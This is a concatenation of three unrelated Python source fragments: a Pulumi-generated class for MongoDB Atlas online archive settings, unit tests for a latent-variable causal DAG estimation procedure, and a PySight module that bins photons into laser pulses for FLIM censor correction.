def partition_fields(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OnlineArchivePartitionFieldArgs']]]]):
pulumi.set(self, "partition_fields", value)
@property
@pulumi.getter
def paused(self) -> Optional[pulumi.Input[bool]]:
"""
State of the online archive. This is required for pausing an active or resume a paused online archive. The resume request will fail if the collection has another active online archive.
"""
return pulumi.get(self, "paused")
@paused.setter
def paused(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "paused", value)
@property
@pulumi.getter(name="syncCreation")
def sync_creation(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "sync_creation")
@sync_creation.setter
def sync_creation(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "sync_creation", value)
@pulumi.input_type
class _OnlineArchiveState:
def __init__(__self__, *,
archive_id: Optional[pulumi.Input[str]] = None,
cluster_name: Optional[pulumi.Input[str]] = None,
coll_name: Optional[pulumi.Input[str]] = None,
criteria: Optional[pulumi.Input['OnlineArchiveCriteriaArgs']] = None,
db_name: Optional[pulumi.Input[str]] = None,
partition_fields: Optional[pulumi.Input[Sequence[pulumi.Input['OnlineArchivePartitionFieldArgs']]]] = None,
paused: Optional[pulumi.Input[bool]] = None,
project_id: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
sync_creation: Optional[pulumi.Input[bool]] = None):
"""
Input properties used for looking up and filtering OnlineArchive resources.
:param pulumi.Input[str] archive_id: ID of the online archive.
:param pulumi.Input[str] cluster_name: Name of the cluster that contains the collection.
:param pulumi.Input[str] coll_name: Name of the collection.
:param pulumi.Input['OnlineArchiveCriteriaArgs'] criteria: Criteria to use for archiving data.
:param pulumi.Input[str] db_name: Name of the database that contains the collection.
:param pulumi.Input[Sequence[pulumi.Input['OnlineArchivePartitionFieldArgs']]] partition_fields: Fields to use to partition data. You can specify up to two frequently queried fields to use for partitioning data. Note that queries that don’t contain the specified fields will require a full collection scan of all archived documents, which will take longer and increase your costs. To learn more about how partition improves query performance, see [Data Structure in S3](https://docs.mongodb.com/datalake/admin/optimize-query-performance/#data-structure-in-s3). The value of a partition field can be up to a maximum of 700 characters. Documents with values exceeding 700 characters are not archived.
:param pulumi.Input[bool] paused: State of the online archive. This is required for pausing an active or resume a paused online archive. The resume request will fail if the collection has another active online archive.
:param pulumi.Input[str] project_id: The unique ID for the project
:param pulumi.Input[str] state: Status of the online archive. Valid values are: Pending, Archiving, Idle, Pausing, Paused, Orphaned and Deleted
"""
if archive_id is not None:
pulumi.set(__self__, "archive_id", archive_id)
if cluster_name is not None:
pulumi.set(__self__, "cluster_name", cluster_name)
if coll_name is not None:
pulumi.set(__self__, "coll_name", coll_name)
if criteria is not None:
pulumi.set(__self__, "criteria", criteria)
if db_name is not None:
pulumi.set(__self__, "db_name", db_name)
if partition_fields is not None:
pulumi.set(__self__, "partition_fields", partition_fields)
if paused is not None:
pulumi.set(__self__, "paused", paused)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if state is not None:
pulumi.set(__self__, "state", state)
if sync_creation is not None:
pulumi.set(__self__, "sync_creation", sync_creation)
@property
@pulumi.getter(name="archiveId")
def archive_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the online archive.
"""
return pulumi.get(self, "archive_id")
@archive_id.setter
def archive_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "archive_id", value)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the cluster that contains the collection.
"""
return pulumi.get(self, "cluster_name")
@cluster_name.setter
def cluster_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_name", value)
@property
@pulumi.getter(name="collName")
def coll_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the collection.
"""
return pulumi.get(self, "coll_name")
@coll_name.setter
def coll_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "coll_name", value)
@property
@pulumi.getter
def criteria(self) -> Optional[pulumi.Input['OnlineArchiveCriteriaArgs']]:
"""
Criteria to use for archiving data.
"""
return pulumi.get(self, "criteria")
@criteria.setter
def criteria(self, value: Optional[pulumi.Input['OnlineArchiveCriteriaArgs']]):
pulumi.set(self, "criteria", value)
@property
@pulumi.getter(name="dbName")
def db_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the database that contains the collection.
"""
return pulumi.get(self, "db_name")
@db_name.setter
def db_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "db_name", value)
@property
@pulumi.getter(name="partitionFields")
def partition_fields(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OnlineArchivePartitionFieldArgs']]]]:
"""
Fields to use to partition data. You can specify up to two frequently queried fields to use for partitioning data. Note that queries that don’t contain the specified fields will require a full collection scan of all archived documents, which will take longer and increase your costs. To learn more about how partition improves query performance, see [Data Structure in S3](https://docs.mongodb.com/datalake/admin/optimize-query-performance/#data-structure-in-s3). The value of a partition field can be up to a maximum of 700 characters. Documents with values exceeding 700 characters are not archived.
"""
return pulumi.get(self, "partition_fields")
@partition_fields.setter
def partition_fields(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OnlineArchivePartitionFieldArgs']]]]):
pulumi.set(self, "partition_fields", value)
@property
@pulumi.getter
def paused(self) -> Optional[pulumi.Input[bool]]:
"""
State of the online archive. This is required for pausing an active or resume a paused online archive. The resume request will fail if the collection has another active online archive.
"""
return pulumi.get(self, "paused")
@paused.setter
def paused(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "paused", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
The unique ID for the project
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
Status of the online archive. Valid values are: Pending, Archiving, Idle, Pausing, Paused, Orphaned and Deleted
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="syncCreation")
def sync_creation(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "sync_creation")
@sync_creation.setter
| |
" diff. wrt. population B = %s" % diff_wrt_pop
thresh = 0.07
if diff_wrt_pop > thresh:
print("*** (> %s)" % thresh, colored(text, 'red'))
else:
print(text)
# Check distance of estimate's score and pop. score
diff_scores = estimate_score - pop_score
text = " diff. wrt. to pop score = %s - pop. score = %s" % (
diff_scores, pop_score)
if diff_scores > 0:
print("*** (> 0)" % thresh, colored(text, 'red'))
else:
print(text)
self.assertLess(estimate_score - pop_score, 0)
# print("Population B\n",model.B)
# print("Estimated B\n", estimated_B)
mask = np.logical_not(model.A)
self.assertTrue(np.allclose(estimated_B[mask], 0))
def test_finite_sample(self):
"""For random graphs, test the procedure on the true connectivity
matrix, with a finite sample.
TEST PASSES IF:
- estimated B respects sparsity in A
WARNING IF:
- score is larger than score of population parameters
- estimated B is more than 0.07 away from population B
"""
G = NUM_GRAPHS
p = 10
num_latent = 2
e = 5
var_lo, var_hi = 1, 2
B_lo, B_hi = 0.6, 0.8
n = 1000
print("\n" + "-" * 70)
print("Testing alternating procedure with a finite sample (n_e = %d)" % n)
for i in range(G):
print("\nGraph %d" % i)
# Build model
model = sample_model(p, set(range(p)), num_latent,
e, var_lo, var_hi, B_lo, B_hi, random_state=i)
# print(model)
_, sample_covariances, n_obs = model.sample(
n, compute_covs=True, random_state=i)
pop_score = model.score(sample_covariances, n_obs)
score_class = Score((sample_covariances, n_obs),
num_latent=num_latent, psi_max=None, psi_fixed=False,
max_iter=1000, threshold_dist_B=1e-3,
threshold_fluctuation=1, max_fluctuations=10,
threshold_score=1e-6, learning_rate=10)
start = time.time()
estimated_model, estimate_score = score_class.score_dag(
model.A, set(range(model.p)), verbose=0)
print(" Done in %0.2f seconds" % (time.time() - start))
# Check distance of estimated B and pop. B
estimated_B = estimated_model.B
diff_wrt_pop = abs(model.B - estimated_B).max()
text = " diff. wrt. population B = %s" % diff_wrt_pop
thresh = 0.07
if diff_wrt_pop > thresh:
print("*** (> %s)" % thresh, colored(text, 'red'))
else:
print(text)
# Check distance of estimate's score and pop. score
diff_scores = estimate_score - pop_score
text = " diff. wrt. to pop score = %s - pop. score = %s" % (
diff_scores, pop_score)
thresh = 0
if diff_scores > thresh:
print("*** (> %s)" % thresh, colored(text, 'red'))
else:
print(text)
# self.assertLess(abs(estimate_score - pop_score), 1e-3)
# print("Population B\n",model.B)
# print("Estimated B\n", estimated_B)
mask = np.logical_not(model.A)
self.assertTrue(np.allclose(estimated_B[mask], 0))
def test_finite_sample_latent_vs_not(self):
"""For random graphs, test the procedure on the true connectivity
matrix, with a finite sample.
TEST PASSES IF:
- estimated B respects sparsity in A
- score when using latents is better than without them
WARNING IF:
- L-infinity distance to population B is smaller using latents than without them
"""
G = NUM_GRAPHS
p = 10
num_latent = 2
e = 5
var_lo, var_hi = 1, 2
B_lo, B_hi = 0.6, 0.8
n = 1000
print("\n" + "-" * 70)
print(
"Testing procedure with vs. without fixed-psi on a finite sample (n_e = %d)" % n)
for i in range(G):
print("\nGraph %d" % i)
# Build model
model = sample_model(p, set(range(p)), num_latent, e, var_lo,
var_hi, B_lo, B_hi, random_state=i)
# print(model)
_, sample_covariances, n_obs = model.sample(
n, compute_covs=True, random_state=i)
pop_score = model.score(sample_covariances, n_obs)
start = time.time()
# Estimate with latent variables
score_class = Score((sample_covariances, n_obs),
num_latent=num_latent, psi_max=None, psi_fixed=False,
max_iter=1000, threshold_dist_B=1e-3,
threshold_fluctuation=1, max_fluctuations=10,
threshold_score=1e-6, learning_rate=10)
estimated_model_latents, estimate_score_latents = score_class.score_dag(
model.A, set(range(model.p)), verbose=0)
# Estimate without latent variables
score_class = Score((sample_covariances, n_obs),
num_latent=0, psi_max=None, psi_fixed=False,
max_iter=1000, threshold_dist_B=1e-3,
threshold_fluctuation=1, max_fluctuations=10,
threshold_score=1e-6, learning_rate=10)
estimated_model_no_latents, estimate_score_no_latents = score_class.score_dag(
model.A, set(range(model.p)), verbose=0)
print(" Done in %0.2f seconds" % (time.time() - start))
# Check difference in scores
diff_scores = estimate_score_latents - estimate_score_no_latents
text = " score w. latents < score wo. latents: %s - diff = %s - pop. score = %s" % (
estimate_score_latents < estimate_score_no_latents, diff_scores, pop_score)
thresh = 0
if diff_scores > thresh:
print("*** (> %s)" % thresh, colored(text, 'red'))
else:
print(text)
self.assertLess(estimate_score_latents, estimate_score_no_latents)
# Check difference in distances to population B (estimate
# with latents should be closer)
dist_B_latents = abs(estimated_model_latents.B - model.B).max()
dist_B_no_latents = abs(
estimated_model_no_latents.B - model.B).max()
diff_dists = dist_B_latents - dist_B_no_latents
text = " dist. to population B w. latents < wo. latents: %s - diff = %s" % (
dist_B_latents < dist_B_no_latents, diff_dists)
thresh = 0
if diff_dists > thresh:
print("*** (> %s)" % thresh, colored(text, 'red'))
else:
print(text)
# self.assertLess(dist_B_latents, dist_B_no_latents)
# Check sparsity is respected
mask = np.logical_not(model.A)
self.assertTrue(np.allclose(estimated_model_latents.B[mask], 0))
self.assertTrue(np.allclose(estimated_model_no_latents.B[mask], 0))
def test_finite_sample_psi_fixed_vs_not(self):
"""For random graphs, test the procedure on the true connectivity
matrix, with a finite sample.
TEST PASSES IF:
- estimated B respects sparsity in A
- psis of model with fixed_psi = True are indeed all the same
- score without constraint that hidden variances to be equal is better than with it
WARNING IF:
- L-infinity distance to population B is better without constraints than with fixed psi
"""
G = NUM_GRAPHS
p = 10
num_latent = 2
e = 5
var_lo, var_hi = 1, 2
B_lo, B_hi = 0.6, 0.8
n = 1000
print("\n" + "-" * 70)
print(
"Testing procedure with vs. without latents on a finite sample (n_e = %d)" % n)
for i in range(G):
print("\nGraph %d" % i)
# Build model
model = sample_model(p, set(range(p)), num_latent, e, var_lo,
var_hi, B_lo, B_hi, random_state=i)
# print(model)
_, sample_covariances, n_obs = model.sample(
n, compute_covs=True, random_state=i)
pop_score = model.score(sample_covariances, n_obs)
start = time.time()
# Estimate with latent variables
score_class = Score((sample_covariances, n_obs),
num_latent=num_latent, psi_max=None, psi_fixed=False,
max_iter=1000, threshold_dist_B=1e-3,
threshold_fluctuation=1, max_fluctuations=10,
threshold_score=1e-6, learning_rate=10)
estimated_model, estimate_score = score_class.score_dag(
model.A, set(range(model.p)), verbose=0)
# Estimate without latent variables
score_class = Score((sample_covariances, n_obs),
num_latent=num_latent, psi_max=None, psi_fixed=True,
max_iter=1000, threshold_dist_B=1e-3,
threshold_fluctuation=1, max_fluctuations=10,
threshold_score=1e-6, learning_rate=10)
estimated_model_fixed, estimate_score_fixed = score_class.score_dag(
model.A, set(range(model.p)), verbose=0)
print(" Done in %0.2f seconds" % (time.time() - start))
# print(estimated_model.psis)
# print(estimated_model_fixed.psis)
self.assertTrue(
(estimated_model_fixed.psis[0, :] == estimated_model_fixed.psis).all())
# Check difference in scores
diff_scores = estimate_score - estimate_score_fixed
text = " score unconstrained < score fixed psi: %s - diff = %s - pop. score = %s" % (
estimate_score < estimate_score_fixed, diff_scores, pop_score)
thresh = 0
if diff_scores > thresh:
print("*** (> %s)" % thresh, colored(text, 'red'))
else:
print(text)
self.assertLess(estimate_score, estimate_score_fixed)
# Check difference in distances to population B (estimate
# with latents should be closer)
dist_B = abs(estimated_model.B - model.B).max()
dist_B_fixed = abs(estimated_model_fixed.B - model.B).max()
diff_dists = dist_B - dist_B_fixed
text = " dist. to population B unconstrained < fixed psi: %s - diff = %s" % (
dist_B < dist_B_fixed, diff_dists)
thresh = 0
if diff_dists > thresh:
print("*** (> %s)" % thresh, colored(text, 'red'))
else:
print(text)
# self.assertLess(dist_B, dist_B_fixed)
# Check that sparsity is respected
mask = np.logical_not(model.A)
self.assertTrue(np.allclose(estimated_model.B[mask], 0))
self.assertTrue(np.allclose(estimated_model_fixed.B[mask], 0))
def test_with_interventions_population(self):
"""Generate the population covariances from a random graph and some
random intervention targets; check that the score remains
close when applying the alternating procedure to I-equivalent
DAGs, when setting I to I* and to the full set.
TEST PASSES IF:
- estimated B respects sparsity in A
- score is <5e-2 from score of true population parameters
"""
G = NUM_GRAPHS
p = 10
num_latent = 2
e = 5
var_lo, var_hi = 1, 2
B_lo, B_hi = 0.6, 0.8
size_I = (0, 3)
print("\n" + "-" * 70)
print("Testing alternating procedure with population covariances and different interventions")
for i in range(G):
# Sample intervention targets
true_I = set(
sempler.generators.intervention_targets(p, 1, size_I)[0])
# Build model
model = sample_model(p, true_I, num_latent, e, var_lo,
var_hi, B_lo, B_hi, random_state=i)
sample_covariances = model.covariances()
n_obs = np.array([1] * model.e)
pop_score = model.score(sample_covariances, n_obs)
# Get equivalent DAGs
icpdag = utils.dag_to_icpdag(model.A, true_I)
equivalent_dags = utils.all_dags(icpdag)
print("\nGraph %d - I* = %s - %d equivalent DAGs" %
(i, true_I, len(equivalent_dags)))
for k, dag in enumerate(equivalent_dags):
for I in [true_I, set(range(p))]:
print(" Eq. graph %d/%d; I = %s" %
(k + 1, len(equivalent_dags), I))
start = time.time()
score_class = Score((sample_covariances, n_obs),
num_latent=num_latent, psi_max=None, psi_fixed=False,
max_iter=1000, threshold_dist_B=1e-3,
threshold_fluctuation=1, max_fluctuations=10,
threshold_score=1e-6, learning_rate=10)
estimated_model, estimate_score = score_class.score_dag(
dag, I, verbose=0)
mask = np.logical_not(dag)
print(" Done in %0.2f seconds" % (time.time() - start))
| |
"""
__author__ = <NAME>
"""
import attr
import numpy as np
import pandas as pd
from attr.validators import instance_of
from pysight.nd_hist_generator.movie import Movie, FrameChunk
from collections import deque, namedtuple
from typing import Tuple, Union
from numba import jit, uint8, int64
@attr.s(slots=True)
class CensorCorrection(object):
raw = attr.ib(validator=instance_of(dict))
data = attr.ib(validator=instance_of(pd.DataFrame))
movie = attr.ib(validator=instance_of(Movie))
all_laser_pulses = attr.ib()
nano_flim_list = attr.ib(init=False)
flim = attr.ib(default=False, validator=instance_of(bool))
reprate = attr.ib(default=80e6, validator=instance_of(float))
binwidth = attr.ib(default=800e-12, validator=instance_of(float))
laser_offset = attr.ib(default=3.5, validator=instance_of(float))
num_of_channels = attr.ib(default=1, validator=instance_of(int))
@property
def bins_bet_pulses(self) -> int:
return int(np.ceil(1 / (self.reprate * self.binwidth)))
@property
def offset(self):
return int(np.floor(self.laser_offset * 10 ** -9 / self.binwidth))
def run(self):
"""
Main pipeline for the censor correction part.
"""
if self.flim:
print("Starting the censor correction...")
self.create_arr_of_hists_deque()
else:
print("FLIM deactivated, no censor correction performed.")
def __gen_laser_pulses_deque(self) -> np.ndarray:
"""
If data has laser pulses - return them. Else - simulate them with an offset
"""
start_time = 0
step = self.bins_bet_pulses
volumes_in_movie = self.movie.gen_of_volumes()
if (
self.all_laser_pulses == 0 and self.flim == False
): # no 'Laser' data was recorded
for vol in volumes_in_movie:
yield np.arange(
start=start_time + self.offset,
stop=vol.end_time,
step=step,
dtype=np.uint64,
)
elif self.all_laser_pulses == 0 and self.flim == True:
pass
else:
for vol in volumes_in_movie:
yield self.all_laser_pulses[
(self.all_laser_pulses >= vol.abs_start_time - step)
& (self.all_laser_pulses <= vol.end_time + step)
] + self.offset
def __get_bincount_deque(self):
print("Movie object created. Generating the bincount deque...")
bincount_deque = deque()
laser_pulses_deque = self.__gen_laser_pulses_deque()
volumes_in_movie = self.movie.gen_of_volumes()
for idx, vol in enumerate(volumes_in_movie):
censored = CensoredVolume(
df=vol.data,
vol=vol,
offset=self.offset,
laser_pulses=next(laser_pulses_deque),
)
dig, bincount = censored.gen_bincount()
pos_idx = np.where(dig >= 0)[0]
dig = dig[pos_idx]
pos_photons = censored.df.iloc[pos_idx, -1].values.T
if len(pos_photons) == 0:
data_dict = {
"photon_hist": np.zeros((self.bins_bet_pulses, 1), dtype=np.uint8),
"bincount": bincount,
"num_empty_hists": bincount[0],
}
return data_dict
photon_hist = np.zeros(
(self.bins_bet_pulses, pos_photons.shape[0]), dtype=np.uint8
)
for laser_idx, photon in enumerate(np.nditer(pos_photons)):
start_time = censored.laser_pulses[dig[laser_idx]]
try:
end_time = censored.laser_pulses[dig[laser_idx] + 1]
except IndexError: # photons out of laser pulses
continue
else:
photon_hist[:, laser_idx] = np.histogram(
photon, bins=np.arange(start_time, end_time + 1, dtype="uint64")
)[0]
data_dict = {
"photon_hist": photon_hist,
"bincount": bincount,
"num_empty_hists": bincount[0],
}
assert (
data_dict["num_empty_hists"] >= 0
), "Sum of bincount: {}, number of photons: {}".format(
sum(bincount), laser_idx
)
bincount_deque.append(data_dict)
return bincount_deque
def find_temporal_structure_deque(self):
temp_struct_deque = deque()
laser_pulses_deque = self.__gen_laser_pulses_deque()
volumes_in_movie = self.movie.gen_of_volumes()
for idx, vol in enumerate(volumes_in_movie):
censored = CensoredVolume(
df=vol.data,
vol=vol,
offset=self.offset,
laser_pulses=next(laser_pulses_deque),
binwidth=self.binwidth,
reprate=self.reprate,
)
temp_struct_deque.append(censored.find_temp_structure())
return temp_struct_deque
def __worker_arr_of_hists(self, vol):
censored = CensoredVolume(
df=vol.data,
vol=vol,
offset=self.offset,
binwidth=self.binwidth,
reprate=self.reprate,
)
return censored.gen_arr_of_hists()
def create_arr_of_hists_deque(self):
"""
For each volume generate a single matrix with the same size as the underlying volume,
which contains a histogram of photons in their laser pulses for each pixel.
:return: deque() that contains an array of histograms in each place
"""
self.nano_flim_list = [] # each cell contains a different data channel
for chan in range(1, self.num_of_channels + 1):
print("Starting channel number {}: ".format(chan))
volumes_in_movie = self.movie.gen_of_volumes(channel_num=chan)
self.nano_flim_list.append(
[self.__worker_arr_of_hists(vol) for vol in volumes_in_movie]
)
def create_array_of_hists_deque(self):
"""
Go through each volume in the deque and find the laser pulses for each pixel, creating a summed histogram per pixel.
:return:
"""
temp_struct_deque = deque()
laser_pulses_deque = self.__gen_laser_pulses_deque()
volumes_in_movie = self.movie.gen_of_volumes()
for idx, vol in enumerate(volumes_in_movie):
censored = CensoredVolume(
df=vol.data,
vol=vol,
offset=self.offset,
laser_pulses=next(laser_pulses_deque),
binwidth=self.binwidth,
reprate=self.reprate,
)
temp_struct_deque.append(censored.gen_array_of_hists())
return temp_struct_deque
def __gen_labels(self, size: int, label: Union[int, float]) -> np.ndarray:
"""
Create labels for the ML algorithm. Label value must be an integer.
:size: Number of elements
:return: np.ndarray
"""
if isinstance(label, int): # fixed power during the session
return np.ones(size, dtype=np.uint8) * label
elif isinstance(
label, float
): # `label` contains the frequency of the triangular wave
pass
def learn_histograms(
self, label: Union[int, float], power: int, folder_to_save: str
):
"""
Implement the machine learning algorithm on the data.
:param label: Label of ML algorithm.
:param power: How much power was injected to the Qubig. For saving the file.
:return: data, labels
"""
from sklearn import svm, metrics
import pathlib
# Start by generating the data and arranging it properly for the machine
bincount = self.__get_bincount_deque()
print("Bincount done. Adding all data to a single matrix.")
data = np.empty((self.bins_bet_pulses, 0))
for vol in bincount:
data = np.concatenate(
(data, vol["photon_hist"]), axis=1
) # the histograms with photons in them
data = np.concatenate(
(
data,
np.zeros(
(self.bins_bet_pulses, vol["num_empty_hists"]), dtype=np.uint8
),
),
axis=1,
) # empty hists
data = data.T
n_samples = data.shape[0]
labels = self.__gen_labels(n_samples, label)
classifier = svm.SVC(gamma=0.001)
labels[1] = 10 # toying around
print("Fitting the data...")
classifier.fit(data[: n_samples // 2], labels[: n_samples // 2])
# Predictions
expected = labels[n_samples // 2 :]
predicted = classifier.predict(data[n_samples // 2 :])
print("Number of samples is %s." % n_samples)
print(
"Classification report for classifier %s:\n%s\n"
% (classifier, metrics.classification_report(expected, predicted))
)
print("Confusion matrix:\n%s" % metrics.confusion_matrix(expected, predicted))
# Save the data for future use
folder_as_path = pathlib.Path(folder_to_save)
filename = str(folder_as_path / "{}p_label_{}.npy".format(power, label))
self.__save_data(data=data, filename=filename)
return data, labels
def __save_data(self, data: np.ndarray, filename: str):
"""
Save the data array for future training.
:param data: Data to be learnt.
:param filename: Including dir
:return:
"""
print("Saving to {}...".format(filename))
with open(filename, "wb") as f:
np.save(f, data)
def append_laser_line(self):
"""
Add a final laser line to the laser signal input.
"""
last_laser_row = pd.DataFrame(
{
"abs_time": self.raw["Laser"]["abs_time"].iat[-1]
+ self.bins_bet_pulses,
"edge": 0,
"sweep": self.raw["Laser"]["sweep"].iat[-1],
"time_rel_sweep": self.raw["Laser"]["time_rel_sweep"].iat[-1]
+ self.bins_bet_pulses,
},
index=[self.raw["Laser"].shape[0]],
)
self.raw["Laser"] = pd.concat([self.raw["Laser"], last_laser_row])
def train_dataset(self):
"""
Using almost raw data, allocate photons to their laser pulses
(instead of laser pulses to photons) and create all 16 bit words for the ML algorithm.
:return:
"""
# Append a fake laser pulse to retain original number of "bins"
self.append_laser_line()
sorted_indices = pd.cut(
self.raw["PMT1"]["abs_time"],
bins=self.raw["Laser"]["abs_time"],
labels=self.raw["Laser"].iloc[:-1, 3],
include_lowest=True,
)
self.raw["Laser"].set_index(
keys="time_rel_sweep", inplace=True, append=True, drop=True
)
num_of_pos_bins = 22
new_bins = np.arange(-10, num_of_pos_bins + 1) # 32 bins
min_time_after_sweep = 10
max_time_after_sweep = (
self.raw["Laser"]["time_rel_sweep"].max() - num_of_pos_bins - 1
)
indices = np.arange(min_time_after_sweep, max_time_after_sweep)
hist_df = pd.DataFrame([], dtype=object)
for idx in indices:
cur_pulse = self.raw["Laser"].xs(
idx, level="time_rel_sweep", drop_level=False
)
@attr.s(slots=True)
class CensoredVolume(object):
df = attr.ib(validator=instance_of(pd.DataFrame))
chunk = attr.ib(validator=instance_of(FrameChunk))
offset = attr.ib(validator=instance_of(int))
binwidth = attr.ib(default=800e-12)
reprate = attr.ib(default=80e6)
@property
def bins_bet_pulses(self) -> int:
return int(np.ceil(1 / (self.reprate * self.binwidth)))
def gen_bincount(self) -> Tuple[np.ndarray, np.ndarray]:
"""
Bin the photons into their relative laser pulses, and count how many photons arrived due to each pulse.
"""
hist, _ = np.histogram(
self.chunk.data.loc[:, "time_rel_frames"].values, bins=self.laser_pulses
)
dig = (
np.digitize(
self.chunk.data.loc[:, "time_rel_frames"].values, bins=self.laser_pulses
)
- 1
)
return dig, np.bincount(hist)
def find_temp_structure(self) -> np.ndarray:
"""
Generate a summed histogram of the temporal structure of detected photons.
"""
bins = np.arange(
start=0, stop=np.ceil(1 / (self.reprate * self.binwidth)) + 1, step=1
)
subtracted_times, _, _ = self.sort_photons_in_pulses()
hist, _ = np.histogram(subtracted_times, bins=bins)
return hist
def sort_photons_in_pulses(self):
"""
Helper function to generate a searchsorted output of photons in laser pulses.
"""
pulses = self.laser_pulses
sorted_indices: np.ndarray = np.searchsorted(
pulses, self.movie.data["time_rel_frames"].values
) - 1
array_of_laser_starts = pulses[sorted_indices]
subtracted_times = (
self.movie.data["time_rel_frames"].values - array_of_laser_starts
)
return subtracted_times, array_of_laser_starts, sorted_indices
def gen_array_of_hists(self) -> np.ndarray:
"""
For a specific frame, sort photons and laser pulses inside the pixels to gain
statistics on the distribution of the photons inside the pixels.
:return: np.ndarray of the same size as the original image. Each pixels contains
a histogram inside it.
"""
BinData = namedtuple("BinData", ("hist", "pulses", "photons"))
all_pulses = 0
all_photons = 0
hist, edges = self.chunk.create_hist()
# Create a relative timestamp to the line signal for each laser pulse
sorted_pulses = np.searchsorted(edges[0][:-1], self.laser_pulses) - 1
pulses = pd.DataFrame(
data=self.laser_pulses[np.where(sorted_pulses >= 0)[0]],
columns=["time_rel_frames"],
)
pulses = pulses.assign(
Lines=edges[0][:-1][sorted_pulses[np.where(sorted_pulses >= 0)[0]]]
)
pulses.dropna(how="any", inplace=True)
pulses.loc[:, "Lines"] = pulses.loc[:, "Lines"].astype("uint64")
pulses.loc[:, "time_rel_line"] = (
pulses.loc[:, "time_rel_frames"] - pulses.loc[:, "Lines"]
)
pulses.loc[:, "Lines"] = pulses.loc[:, "Lines"].astype("category")
pulses.set_index(keys=["Lines"], inplace=True, append=True, drop=True)
# Allocate laser pulses and photons to their bins
pulses.loc[:, "bins_x"] = (
np.digitize(pulses.loc[:, "time_rel_frames"].values, bins=edges[0]) - 1
).astype("uint16", copy=False)
pulses.loc[:, "bins_y"] = (
np.digitize(pulses.loc[:, "time_rel_line"].values, bins=edges[1]) - 1
).astype("uint16", copy=False)
self.chunk.data.loc[:, "bins_x"] = (
np.digitize(self.chunk.data.loc[:, "time_rel_frames"].values, bins=edges[0])
- 1
).astype("uint16", copy=False)
self.chunk.data.loc[:, "bins_y"] = (
np.digitize(self.chunk.data.loc[:, "time_rel_line"].values, bins=edges[1])
- 1
).astype("uint16", copy=False)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.